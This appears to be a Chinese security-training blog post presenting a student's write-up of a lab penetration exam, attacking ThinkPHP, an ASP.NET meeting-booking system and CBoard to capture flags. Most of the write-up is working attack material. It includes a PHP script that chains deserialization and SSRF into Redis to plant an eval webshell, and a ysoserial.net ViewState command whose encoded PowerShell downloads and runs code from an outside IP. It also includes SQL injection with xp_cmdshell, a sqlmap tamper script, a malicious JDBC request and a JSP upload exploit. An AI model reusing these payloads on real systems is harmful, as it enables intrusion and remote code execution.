免责声明:本公众号所提供的文字和信息仅供学习和研究使用,不得用于任何非法用途。我们强烈谴责任何非法活动,并严格遵守法律法规。读者应该自觉遵守法律法规,不得利用本公众号所提供的信息从事任何违法活动。本公众号不对读者的任何违法行为承担任何责任。
起因
这一年暗月更新了很多教程 例如java代码审计、net代码审计 、php代码审计等。
年底了该来一次大的考核了测试的目的是通过考核测试同学们学习的效果,在考核过程中发现自己的不足,往后应该更有针对性学习。
本次考核的内容
本次考核采用在线靶场 三台服务器 共四个FLAG 拿下即可通过。
本次考核的重点 多个漏洞配合外网打点,考验大家的挖洞漏洞和利用漏洞的能力。
主要的内容包括 java代码审计、net代码审计、php代码审计 考核大家对WEB安全的掌握程度,也有linux和windows提权等
本次考核全程黑盒模式 发现漏洞 利用漏洞 打通所有关卡。
通过率
本次参与考核的人数是100人 通过8人 通过率 8% 符合预期
以下是某个同学通过考核的WP
thinkphp
参考:https://xz.aliyun.com/t/7594
redis缓存
以think_serialize: 开头的value通过get获取会触发 反序列化
脚本编写过程
先将生成的反序列化payload取反(取反是为了防止在传输过程中发生报错),由于get请求的长度限制遂将他分段传输,利用redis的APPEND命令不断的追加,待追加完成之后用bitop:not再次取反 即可得到完整的反序列化数据
一键利用脚本如下
反序列化poc 用 phpggc即可生成
<?php
// eval 1 > payload123123.php
$a= "think_serialize:";
$a = $a."O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A5%3A%7Bs%3A9%3A%22%00%2A%00append%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A8%3A%22getError%22%3B%7Ds%3A8%3A%22%00%2A%00error%22%3BO%3A27%3A%22think%5Cmodel%5Crelation%5CHasOne%22%3A3%3A%7Bs%3A15%3A%22%00%2A%00selfRelation%22%3Bb%3A0%3Bs%3A8%3A%22%00%2A%00query%22%3BO%3A14%3A%22think%5Cdb%5CQuery%22%3A1%3A%7Bs%3A8%3A%22%00%2A%00model%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A28%3A%22%00think%5Cconsole%5COutput%00handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A2%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3BO%3A27%3A%22think%5Ccache%5Cdriver%5CMemcache%22%3A3%3A%7Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A5%3A%7Bs%3A6%3A%22expire%22%3Bi%3A0%3Bs%3A12%3A%22cache_subdir%22%3Bb%3A0%3Bs%3A6%3A%22prefix%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22path%22%3Bs%3A0%3A%22%22%3Bs%3A13%3A%22data_compress%22%3Bb%3A0%3B%7Ds%3A10%3A%22%00%2A%00handler%22%3BO%3A13%3A%22think%5CRequest%22%3A2%3A%7Bs%3A6%3A%22%00%2A%00get%22%3Ba%3A1%3A%7Bs%3A18%3A%22HEXENS%3CgetAttr%3Eno%3C%22%3Bs%3A53%3A%22echo+%22%3C%3Fphp+%40eval%28%5C%24_POST%5B1%5D%29%3B%3F%3E%22+%3E+payload123123.php%22%3B%7Ds%3A9%3A%22%00%2A%00filter%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A6%3A%22%00%2A%00tag%22%3Bb%3A1%3B%7Ds%3A9%3A%22%00%2A%00config%22%3Ba%3A7%3A%7Bs%3A4%3A%22host%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A4%3A%22port%22%3Bi%3A11211%3Bs%3A6%3A%22expire%22%3Bi%3A3600%3Bs%3A7%3A%22timeout%22%3Bi%3A0%3Bs%3A12%3A%22session_name%22%3Bs%3A6%3A%22HEXENS%22%3Bs%3A8%3A%22username%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22password%22%3Bs%3A0%3A%22%22%3B%7D%7Ds%3A9%3A%22%00%2A%00styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A7%3A%22getAttr%22%3B%7D%7D%7Ds%3A11%3A%22%00%2A%00bindAttr%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A2%3A%22no%22%3Bi%3A1%3Bs%3A3%3A%22123%22%3B%7D%7Ds%3A9%3A%22%00%2A%00parent%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A28%3A%22%00think%5Cconsole%5COutput%00handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A2%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3BO%3A27%3A%22think%5Ccache%5Cdriver%5CMemcache%22%3A3%3A%7Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A5%3A%7Bs%3A6%3A%22expire%22%3Bi%3A0%3Bs%3A12%3A%22cache_subdir%22%3Bb%3A0%3Bs%3A6%3A%22prefix%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22path%22%3Bs%3A0%3A%22%22%3Bs%3A13%3A%22data_compress%22%3Bb%3A0%3B%7Ds%3A10%3A%22%00%2A%00handler%22%3BO%3A13%3A%22think%5CRequest%22%3A2%3A%7Bs%3A6%3A%22%00%2A%00get%22%3Ba%3A1%3A%7Bs%3A18%3A%22HEXENS%3CgetAttr%3Eno%3C%22%3Bs%3A53%3A%22echo+%22%3C%3Fphp+%40eval%28%5C%24_POST%5B1%5D%29%3B%3F%3E%22+%3E+payload123123.php%22%3B%7Ds%3A9%3A%22%00%2A%00filter%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A6%3A%22%00%2A%00tag%22%3Bb%3A1%3B%7Ds%3A9%3A%22%00%2A%00config%22%3Ba%3A7%3A%7Bs%3A4%3A%22host%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A4%3A%22port%22%3Bi%3A11211%3Bs%3A6%3A%22expire%22%3Bi%3A3600%3Bs%3A7%3A%22timeout%22%3Bi%3A0%3Bs%3A12%3A%22session_name%22%3Bs%3A6%3A%22HEXENS%22%3Bs%3A8%3A%22username%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22password%22%3Bs%3A0%3A%22%22%3B%7D%7Ds%3A9%3A%22%00%2A%00styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A7%3A%22getAttr%22%3B%7D%7Ds%3A15%3A%22%00%2A%00selfRelation%22%3Bb%3A0%3Bs%3A8%3A%22%00%2A%00query%22%3BO%3A14%3A%22think%5Cdb%5CQuery%22%3A1%3A%7Bs%3A8%3A%22%00%2A%00model%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A28%3A%22%00think%5Cconsole%5COutput%00handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A2%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3BO%3A27%3A%22think%5Ccache%5Cdriver%5CMemcache%22%3A3%3A%7Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A5%3A%7Bs%3A6%3A%22expire%22%3Bi%3A0%3Bs%3A12%3A%22cache_subdir%22%3Bb%3A0%3Bs%3A6%3A%22prefix%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22path%22%3Bs%3A0%3A%22%22%3Bs%3A13%3A%22data_compress%22%3Bb%3A0%3B%7Ds%3A10%3A%22%00%2A%00handler%22%3BO%3A13%3A%22think%5CRequest%22%3A2%3A%7Bs%3A6%3A%22%00%2A%00get%22%3Ba%3A1%3A%7Bs%3A18%3A%22HEXENS%3CgetAttr%3Eno%3C%22%3Bs%3A53%3A%22echo+%22%3C%3Fphp+%40eval%28%5C%24_POST%5B1%5D%29%3B%3F%3E%22+%3E+payload123123.php%22%3B%7Ds%3A9%3A%22%00%2A%00filter%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A6%3A%22%00%2A%00tag%22%3Bb%3A1%3B%7Ds%3A9%3A%22%00%2A%00config%22%3Ba%3A7%3A%7Bs%3A4%3A%22host%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A4%3A%22port%22%3Bi%3A11211%3Bs%3A6%3A%22expire%22%3Bi%3A3600%3Bs%3A7%3A%22timeout%22%3Bi%3A0%3Bs%3A12%3A%22session_name%22%3Bs%3A6%3A%22HEXENS%22%3Bs%3A8%3A%22username%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22password%22%3Bs%3A0%3A%22%22%3B%7D%7Ds%3A9%3A%22%00%2A%00styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A7%3A%22getAttr%22%3B%7D%7D%7D%7D%7D%7D";
$originalString = urldecode($a);
$reversedString = '';
for ($i = 0; $i < strlen($originalString); $i++) {
$reversedString .= $originalString[$i] ^ "\xFF";
}
$length = ceil(strlen($reversedString) / 10);
$segments = str_split($reversedString, $length);
$tmp_key = bin2hex(random_bytes(8));
$redis_ip = "127.0.0.1";
$server_ip = "103.164.63.172:8081";
$url = "http://$server_ip/public/index.php?s=index/Index/geturl&url=dict://$redis_ip:6379/config:set:slave-read-only:no";
echo file_get_contents($url);
foreach ($segments as $value)
{
$url = "http://$server_ip/public/index.php?s=index/Index/geturl&url=dict://$redis_ip:6379/APPEND:$tmp_key:".$value;
echo file_get_contents($url);
}
$url = "http://$server_ip/public/index.php?s=index/Index/geturl&url=dict://$redis_ip:6379/bitop:not:payload12xx123:$tmp_key";
echo file_get_contents($url);
echo file_get_contents("http://$server_ip/public/index.php?s=index/Index/getname&name=payload12xx123");
echo "webshell:\npass:1\nhttp://$server_ip/public/payload123123.php";
?>
在根目录下即可找到flag
会议预定系统
http://103.164.63.231/login.aspx 会议预定系统
前台viewstate反序列化
参考:
https://blog.csdn.net/qq_41891666/article/details/107290131
https://www.websecuritys.cn/index.php/archives/94/
能够在login.aspx出观察到 他的隐藏域
如下
网上熟悉了下打法之后,发现直接用ysoserial.net就能进行攻击
运行 ./ysoserial.exe -p ViewState也会给你常用的用法
在结合网上下载的源码的web.config,从中获取decryptionkey和validationkey 即可完成整个payload构造
./ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAIgBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEANwA1AC4AMQA3ADgALgA3ADMALgAxADQAMQA6ADgAMAAxADEALwBhADEAMQAxACcAKQApACIA" --path="/login.aspx" --apppath="/" -decryptionkey="215D97F766DE50E575496E01C16306C751376E2EBBDE4B51" -validationkey="0BF11533BC55065E2C46C2F295FC5A501A13B28FE43B6F56E57973D4BE818354D21B7102EC24DB26B803D65936A5F1D812158D8F729406C168FC8440B4CDE16B" --islegacy
随后便能直接上线,
然后在土豆提权,在administrator下即可获取到flag
前台注入点1
这个点就是传进来的dt未进行任何过滤我们构造') 进行闭合即可 触发sqli
利用
http://103.164.63.231/report/data_list.aspx?dt=2024-01-27%27);waitfor delay '0:0:5'--
可以直接堆叠
前台注入点2
这个点从cookie中获取了值,先进行了一个Helper.SimpleDecryptStr 简单的解密
能够发现,这就是个简单的字符串变换
我们可以编写tamper脚本很轻松的实现注入
脚本如下
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from urllib.parse import quote
__priority__ = PRIORITY.LOWEST
def dependencies():
singleTimeWarnMessage("此脚本仅适用于 book_meeting")
def simple_encrypt_str(rs):
by = [ord(char) + 1 for char in rs]
encrypted_str = ''.join(chr(byte) for byte in reversed(by))
return encrypted_str
def tamper(payload, **kwargs):
return quote(simple_encrypt_str(payload))
sqlmap -u "http://103.164.63.231/wx/AutoLogin_Qywx.aspx" --level 3 --cookie="qywxusername=1" -p qywxusername --tamper=book_meeting_AutoLogin_Qywx.py -
-ignore-redirects --skip-urlencode
前台注入点3
这个位置和之前的一致,都是对传入的值进行了简单的加密,利用方式与上面的一直
位置位于
/dd/AutoLogin.aspx
站库分离
因为存在堆叠注入,可以直接使用 xp_cmdshell 执行系统命令,通过 sqlmap --os--shell可以一键利用
然后在上线cs,最后可以在users下面即可获取到flag
CBoard
http://103.164.63.172:8090
admin root123默认口令进后台
jdbc 反弹shell
从GitHub上获取的源码,其中pom.xml如下 我们得知了数据库的版本,并且很有可能可以打CC6 用项目:https://github.com/fnmsd/MySQL_Fake_Server 构建evil server
最后http raw如下
POST /dashboard/test.do HTTP/1.1
Host: 103.164.63.172:8090
Content-Length: 403
Accept: application/json, text/plain, */*
DNT: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Origin: http://39.101.184.7:8026
Referer: http://39.101.184.7:8026/cboard/starter.html
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,vi;q=0.7
Cookie: JSESSIONID=351888835121736C4B575BE0B49F2DDA
Connection: close
datasource=%7B%22config%22%3A%7B%22pooled%22%3Atrue%2C%22driver%22%3A%22com.mysql.jdbc.Driver%22%2C%22jdbcurl%22%3A%22jdbc%3Amysql%3A%2F%2F175.178.73.141%3A3306%2Ftest%3FautoDeserialize%3Dtrue%26user%3Dbase64ZGVzZXJfQ0MzMV9pZA%3D%3D%22%2C%22username%22%3A%22CommonsCollections6%22%2C%22password%22%3A%22123456%22%7D%2C%22type%22%3A%22jdbc%22%2C%22name%22%3A%22test%22%7D&query=%7B%22sql%22%3A%221%22%7D
后台任意文件上传
还有一处能够进行任意文件上传
可以从上面源码看到,整个上传过程就是简单的拼接,并未对文件的后缀进行任何的处理,目标环境中间件是Tomcat,这就导致了我们可以上传任意的jsp webshell,从而获取网站的权限
http raw如下
POST /dashboard/uploadImage.do HTTP/1.1
Host: 103.164.63.172:8090
Pragma: no-cache
Cache-Control: no-cache
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,vi;q=0.7
Cookie: JSESSIONID=FBC699B01EC74F0154B6ECF2EF00953B
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryY32jx5xlw76vxXzj
Content-Length: 181
------WebKitFormBoundaryY32jx5xlw76vxXzj
Content-Disposition: form-data; name="file"; filename="2.jsp"
Content-Type: image/png
1
------WebKitFormBoundaryY32jx5xlw76vxXzj--
最后可以从源码中获取完整的拼接路径
http://103.164.63.172:8090/imgs/cockpit/upload/20240128104846/2.jsp
需要学习渗透测试培训 联系暗月
课程目录点击了解 联系微信